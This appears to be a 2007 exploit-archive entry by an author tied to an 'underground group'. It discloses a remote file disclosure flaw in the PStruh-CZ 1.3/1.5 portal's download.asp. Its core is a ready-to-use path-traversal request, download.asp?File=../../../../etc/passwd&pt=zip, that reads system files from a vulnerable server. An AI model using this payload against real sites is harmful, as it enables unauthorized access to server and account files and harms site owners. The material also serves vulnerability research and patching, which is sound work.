[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability
# Published : 2007-05-02
# Author : Dj7xpl
# Previous Title : Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability
# Next Title : 1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*
|* *|
|* Y! Underground Group *|
|* *|
*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*
Portal.....: PStruh-CZ 1.3&1.5
Type.......: Remote File Disclosure Vulnerability
Author.....: Dj7xpl / dj7xpl@2600.ir
HomePage...: http://Dj7xpl.2600.ir
*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*
Bug........:
download.asp?File=[File Path]&PT=[PostFix]
download.asp?File=../../../../etc/passwd&pt=zip
*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
# www.Syue.com [2007-05-02]